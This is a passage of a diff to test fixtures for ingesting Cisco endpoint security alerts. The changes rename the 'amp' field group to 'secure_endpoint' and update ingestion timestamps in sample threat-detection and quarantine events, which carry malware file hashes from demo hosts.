                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -202,7 +202,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -267,7 +267,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510331307Z",
+                "ingested": "2021-09-27T00:41:33.420924044Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -277,7 +277,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -363,7 +363,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510333230Z",
+                "ingested": "2021-09-27T00:41:33.420925814Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":7120,\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -374,7 +374,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.E4FCCBFA69-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -456,7 +456,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510335159Z",
+                "ingested": "2021-09-27T00:41:33.420927579Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -467,7 +467,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.E4FCCBFA69-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -548,7 +548,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510337055Z",
+                "ingested": "2021-09-27T00:41:33.420929335Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":4788,\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -559,7 +559,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.E4FCCBFA69-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -641,7 +641,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510338972Z",
+                "ingested": "2021-09-27T00:41:33.420931110Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":478000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -652,7 +652,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "W32.E4FCCBFA69-95.SBX.TG",
                     "computer": {
                         "active": true,
@@ -714,7 +714,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510340840Z",
+                "ingested": "2021-09-27T00:41:33.420932882Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -724,7 +724,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -785,7 +785,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510342728Z",
+                "ingested": "2021-09-27T00:41:33.420934650Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -795,7 +795,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -856,7 +856,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510344635Z",
+                "ingested": "2021-09-27T00:41:33.420936425Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -866,7 +866,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -931,7 +931,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510346697Z",
+                "ingested": "2021-09-27T00:41:33.420938511Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -941,7 +941,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1006,7 +1006,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510348605Z",
+                "ingested": "2021-09-27T00:41:33.420940406Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1016,7 +1016,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1081,7 +1081,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510350482Z",
+                "ingested": "2021-09-27T00:41:33.420942187Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526294\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1091,7 +1091,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1156,7 +1156,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510352372Z",
+                "ingested": "2021-09-27T00:41:33.420943960Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526293\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1166,7 +1166,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1231,7 +1231,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510354257Z",
+                "ingested": "2021-09-27T00:41:33.420945731Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526292\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1241,7 +1241,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1306,7 +1306,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510356238Z",
+                "ingested": "2021-09-27T00:41:33.420947589Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526291\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -1316,7 +1316,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1381,7 +1381,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:07:04.510358126Z",
+                "ingested": "2021-09-27T00:41:33.420949381Z",
